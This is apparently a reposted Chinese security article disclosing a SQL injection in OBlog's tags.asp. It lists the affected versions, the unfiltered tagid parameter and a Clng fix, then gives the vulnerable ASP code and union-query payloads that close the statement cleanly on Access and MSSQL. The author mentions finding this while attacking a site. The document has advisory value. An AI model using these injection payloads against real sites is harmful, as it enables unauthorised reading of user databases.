|
[图文]OBlog 的SQL注入漏洞检测
官方已经修正该漏洞。
–==+=================== www.nspcn.org =================+==–
–==+ OBlog (tags.asp) Remote SQL Injection Exploit +==–
#Author: Whytt & Tr4c3[at]126[dot]com
#版权所有:http://www.nspcn.org & [BK瞬间群] & Whytt
#漏洞文件tags.asp
#影响版本:
3.13-20060429 [access & mssql]
4.02-20070112 [access & mssql]
4.50 Final Build0619 [access & mssql]
4.60 Final Build0921 [access & mssql]
4.60 Final Build1107 [access & mssql]
#漏洞原因:变量tagid未经过滤传值,带入sql执行,导致注入产生。
#修补方法:检查用户提交的tagid,只允许是数字。
例如:
将iTagId = Trim(Request.Querystring(”tagid”))改成iTagId = Clng(Trim(Request.Querystring(”tagid”)))
[+++]
这 个地方的注射是去年whytt在读OBLOG 4.5的时候发现的,当时没仔细看,只是听他说适用于mssql版,今天在搞一个站的时侯遇见了Oblog 4.60 Final Build1107 (Access),百般无奈又去看了看那个放了N久的”mssql注入点”,这一看不要紧,扩展成了access和mssql通杀。
[+++]
再来啰嗦一下代码的问题tags.asp行15-36
sType = LCase(Trim(Request.Querystring(”t”)))
iTagId = Trim(Request.Querystring(”tagid”)) ’这个地方没过滤,在36行处传值给函数GetUsersByTag
iUserId = Trim(Request.Querystring(”userid”))
sKeyword= Trim(Request(”keyword”))
sAll=Trim(Request.Querystring)
If sAll & sKeyword=”" Then sType=”hottags”
Call link_database()
select Case sType
Case ”hottags”
sTitle=”最热门的100个” & P_TAGS_DESC
sContent=Tags_Hottags()
Case ”cloud”
sTitle=P_TAGS_DESC & ”云图”
sContent=Tags_SystemTags(1)
Case ”list”
sTitle=P_TAGS_DESC & ”列表”
sContent=Tags_SystemTags(0)
Case ”user”
sTitle=P_TAGS_DESC & ”用户”
sContent=GetUsersByTag(iTagId)
函数GetUsersByTag的原型在文件Inc_Tags.asp行320-338
Function GetUsersByTag(byval sTagId)
Dim rst,sSql,sContent
Set rst = Server.CreateObject(”Adodb.Recordset”)
sSql = ”select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=” & sTagId & ” Group By UserId) a,oblog_user b Where a.Userid=b.UserId”
rst.Open sSql,conn,1,1
If rst.Eof Then
sContent=”没有符合条件的用户”
rst.Close
Set rst = Nothing
End If
i=0
Do While Not rst.Eof
sContent=sContent & ”<a href=”& blogurl& rst(”user_dir”) & ”/” & rst(”user_folder”)&”/index.” &f_ext&” target=_blank>” & rst(”userName”) & ”</a><br/>”
rst.movenext
Loop
rst.Close
Set rst = Nothing
GetUsersByTag=sContent
End Function
之所以当初whytt说只适用于mssql,是当时没想起来如何无错闭合,仔细想想原来这么简单.
| 以下是引用片段:select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId |
union前后是一个语句当然不会出错了,但是
| 以下是引用片段: select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 union select Top 100 b.userName,b.user_dir,b.user_folder From (select Userid From oblog_usertags Where Tagid=1 Group By UserId) a,oblog_user b Where a.Userid=b.UserId and 1=2 ’ |
| 新云CMS Online.asp页面过滤不严 | 02-26 |
| 对网软网上购物系统的漏洞分析 | 01-09 |
| 测试SQL防注入脚本 | 12-21 |
| Google Xss又出跨站新漏洞 | 11-06 |
| 一次简单的html injection导致的 | 11-06 |
| 风讯、科讯漏洞利用 | 11-01 |
| Adobe pdf reader URI利用方式浅 | 10-23 |
| 超星阅览器的最新0DAY | 10-19 |
| 运用SQL Injection做数据库渗透的 | 09-22 |
| sa-blog 0day | 09-22 |
| HTML注入的一些简单想法 | 09-10 |
| 网站登陆接口的攻与防 | 09-04 |
您现在的位置: